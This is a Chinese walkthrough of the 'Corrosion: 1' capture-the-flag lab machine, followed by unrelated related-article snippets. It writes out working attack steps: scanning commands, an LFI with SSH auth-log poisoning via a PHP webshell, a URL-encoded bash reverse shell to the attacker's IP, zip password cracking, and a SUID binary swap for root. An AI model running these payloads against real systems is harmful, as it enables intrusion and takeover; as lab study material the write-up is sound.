CORROSION: 1

本机

192.168.223.128

目标机

192.168.223.148

主机发现

nmap -sP 192.168.223.0/24

端口扫描

​nmap -sV -p- -A 192.168.223.148

开启了22 80 端口

看web,是个apache默认界面

扫目录

gobuster dir -u http://192.168.223.148 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

看tasks

# Tasks that need to be completed1. Change permissions for auth log  #更改身份验证日志的权限
2. Change port 22 -> 7672          #更改端口22->7672
3. Set up phpMyAdmin               #设置phpMyAdmin

没什么用,看blog-post

尝试分离文件,无果

继续目录扫描

gobuster dir -u http://192.168.223.148/blog-post -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

archives下有一个php文件

uploads跟blog-post界面一样

看php文件randylogs.php

能打开但不显示内容,测试发现可以LFI,参数为file

任务1Change permissions for auth log 

先找到auth.log  /var/log/auth.log

发现包含ssh日志,用ssh写入一句话木马

ssh -l "<?php system($_GET['x']);?>" 192.168.223.149

反弹shell

http://192.168.223.148/blog-post/archives/randylogs.php?file=/var/log/auth.log&x=echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.223.128%2F4567%200%3E%261%22%20|%20bash

home下有个randy,想进去发现权限不够

尝试一些提权方法,无果

翻到了一个用户备份文件,可能包含randy的密码

unzip需要密码,下载下来爆破一下

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip   

压缩包密码是!randybaby

得到一个密码randylovesgoldfish1998,是randy的密码

sudo -l发现有个easysysinfo文件有root权限

看一下py文件

#!/usr/bin/python3.9import oscommand1 = "/usr/bin/date"
command2 = "/usr/bin/cat /etc/hosts"
command3 = "/usr/bin/uname -a"def output():print("Today is: ")os.system(command1)print("\n")print("Hosts File: ")os.system(command2)print("\n")print("Kernal Version: ")os.system(command3)output()

easyinfo有suid权限,那么可以重新编译一个easysysinfo文件来替代原来的文件

#include <unistd.h>
#include <stdlib.h>void main()
{setuid(0);   #用户ID为rootsetgid(0);   #组ID为rootsystem("bash -i");  #获取shell
}

gcc easysysinfo.c -o easysysinfo

成功提权root,拿到flag

总结:1.ssh一句话木马污染autho.log

           2./var/backups读取用户备份文件

           3.压缩包爆破拿到密码

           4.编译c文件替代同名root权限文件

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/689660.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

推送开权引导的技术内幕

人人都讨厌代码腐化&#xff0c;人人都在腐化代码&#xff01;本文介绍app消息推送开权提醒能力的服务端实现&#xff0c;并说明如何通过手搓一个简易的流程引擎来实现横向的业务场景隔离&#xff0c;纵向的业务流程编排&#xff0c;从而灵活支持业务需求&#xff0c;抑制代码腐…

曲线生成 | 图解B样条曲线生成原理(基本概念与节点生成算法)

目录 0 专栏介绍1 什么是B样条曲线&#xff1f;2 基函数的de Boor递推式3 B样条曲线基本概念图解4 节点生成公式 0 专栏介绍 &#x1f525;附C/Python/Matlab全套代码&#x1f525;课程设计、毕业设计、创新竞赛必备&#xff01;详细介绍全局规划(图搜索、采样法、智能算法等)…

2.Angular组件概述

组件 Angular 组件概述 组件是 Angular 应用的主要构造块。每个组件包括如下部分&#xff1a; 一个 HTML 模板&#xff0c;用于声明页面要渲染的内容一个用于定义行为的 TypeScript 类一个 CSS 选择器&#xff0c;用于定义组件在模板中的使用方式要应用在模板上的 CSS 样式&am…

java以及android类加载机制

类加载机制 一、Java类加载机制 java中&#xff0c;每一个类或者接口&#xff0c;在编译后&#xff0c;都会生成一个.class文件。 类加载机制指的是将这些.class文件中的二进制数据读入到内存中并对数据进行校验&#xff0c;解析和初始化。最终&#xff0c;每一个类都会在方…

OpenAI:Sora视频生成模型技术报告(中文)

概述 视频生成模型作为世界模拟器 我们探索视频数据生成模型的大规模训练。具体来说&#xff0c;我们在可变持续时间、分辨率和宽高比的视频和图像上联合训练文本条件扩散模型。我们利用transformer架构&#xff0c;在视频和图像潜在代码的时空补丁上运行。我们最大的模型Sor…

Springboot+vue的物流管理系统(有报告)。Javaee项目,springboot vue前后端分离项目

演示视频&#xff1a; Springbootvue的物流管理系统&#xff08;有报告&#xff09;。Javaee项目&#xff0c;springboot vue前后端分离项目 项目介绍&#xff1a; 本文设计了一个基于Springbootvue的前后端分离的物流管理系统&#xff0c;采用M&#xff08;model&#xff09;…

代码随想录算法训练营第50天(动态规划07 ● 70. 爬楼梯 (进阶) ● 322. 零钱兑换 ● 279.完全平方数

动态规划part07 70. 爬楼梯 &#xff08;进阶&#xff09;解题思路总结 322. 零钱兑换解题思路总结 279.完全平方数解题思路 70. 爬楼梯 &#xff08;进阶&#xff09; 这道题目 爬楼梯之前我们做过&#xff0c;这次再用完全背包的思路来分析一遍 文章讲解&#xff1a; 70. 爬…

用163邮箱或者outlook接收国科大邮箱的邮件

使用如图下路径&#xff0c;创建一个新的密码&#xff0c;用于在163大师邮箱或者outlook登录即可 如果不行&#xff0c;则需要手动配置邮箱服务器 参考网址&#xff1a;中国科学院邮件系统帮助中心

人工智能_普通服务器CPU_安装清华开源人工智能AI大模型ChatGlm-6B_001---人工智能工作笔记0096

使用centos安装,注意安装之前,保证系统可以联网,然后执行yum update 先去更新一下系统,可以省掉很多麻烦 20240219_150031 这里我们使用centos系统吧,使用习惯了. ChatGlm首先需要一台个人计算机,或者服务器, 要的算力,训练最多,微调次之,推理需要算力最少 其实很多都支持C…

SpringBoot的 8 个优点

目录 1、简化配置 2、快速开发 3、微服务支持 4、内嵌服务器 5、健康监测 6、热部署 7、自动化管理 8、社区支持和生态系统 SpringBoot 是一个基于 Spring 框架的快速开发框架&#xff0c;它通过提供一系列的自动配置、约定优于配置、快速集成等功能&#xff0c;简化了…

Hive切换引擎(MR、Tez、Spark)

Hive切换引擎(MR、Tez、Spark) 1. MapReduce计算引擎(默认) set hive.execution.enginemr;2. Tez引擎 set hive.execution.enginetez;1. Spark计算引擎 set hive.execution.enginespark;

探索LightGBM:类别特征与数据处理

导言 LightGBM是一种高效的梯度提升决策树算法&#xff0c;常用于分类和回归任务。在实际应用中&#xff0c;数据通常包含各种类型的特征&#xff0c;其中类别特征是一种常见的类型。本教程将详细介绍如何在Python中使用LightGBM处理类别特征和数据&#xff0c;包括数据预处理…

借助Aspose.BarCode条码控件,C# 中的文本转 QR 码生成器

二维码用于在较小的空间内存储大量数据。它们易于使用&#xff0c;可以通过智能手机或其他设备扫描来打开网站、观看视频或访问其他编码信息。在这篇博文中&#xff0c;我们将学习如何使用 C# 以编程方式生成基于文本的 QR 码。我们将提供分步指南和代码片段&#xff0c;帮助您…

嵌入式学习 Day20

一. 标准IO和文件IO的区别: 1.标准IO是库函数,是对系统调用的封装 2.文件IO是系统调用,是Linux内核中的函数接口 3.标准IO是有缓存的 4.文件IO是没有缓存的 IO: b c d - 标准IO l s p 二. 文件IO: 1.操作步骤&#xff1a; …

Java中基于Session登录验证

1. 基于Session的登录验证 基于Session的登录验证方式是最简单的一种登录校验方式。 为啥能用Session作为登录验证的一种方式&#xff0c;因为每个用户的请求都会有一个Session&#xff0c;这个对象是Servlet给我们创建的&#xff0c;不需要我们手动创建&#xff0c;并且这个…

Unity之XR Interaction Toolkit如何在VR中实现一个可以拖拽的UI

前言 普通的VR项目中,我们常见的UI都是一个3D的UI,放置在场景中的某个位置,方便我们使用射线点击。但是为了更好的体验,我们可能会有跟随头显的UI,或者可拖拽的UI,这样更方便用户去操作。 所以我们今天的需求就是:如何基于XR Interaction Toolkit 插件 在VR中使用手柄射…

zip解压缩

使用unzip库可以轻松解压zip文件&#xff0c;源码下载地址&#xff1a;http://www.codeproject.com/Articles/7530/Zip-Utils-clean-elegant-simple-C-Win #include <Windows.h> #include"unzip.h" SetCurrentDirectory("c:\\"); HZIP hz OpenZip(…

AlexNet的出现推动深度学习的巨大发展

尽管AlexNet&#xff08;2012&#xff09;的代码只比LeNet&#xff08;1998&#xff09;多出几行&#xff0c;但学术界花了很多年才接受深度学习这一概念&#xff0c;并应用其出色的实验结果。 AlexNet&#xff08;由Alex Krizhevsky、Ilya Sutskever和Geoffrey Hinton共同设计…

OpenAI 发布文生视频Sora大模型,一句话便可生成长达一分钟的视频

前几期的文章&#xff0c;我们介绍了很多文生视频的大模型&#xff0c;包括字节发布的magic video以及stable video diffusion等模型&#xff0c;都可以输入相关的文本生成对应场景的视频。 文生视频大模型必然会成为各个人工智能大厂竞争的核心领地&#xff0c;这不OpenAI刚刚…

代码随想录算法训练营第三十六天|435. 无重叠区间、763. 划分字母区间、56. 合并区间。

435. 无重叠区间 题目链接&#xff1a;无重叠区间 题目描述&#xff1a; 给定一个区间的集合 intervals &#xff0c;其中 intervals[i] [starti, endi] 。返回 需要移除区间的最小数量&#xff0c;使剩余区间互不重叠 。 解题思路&#xff1a; 本题和上一个射气球类似&#x…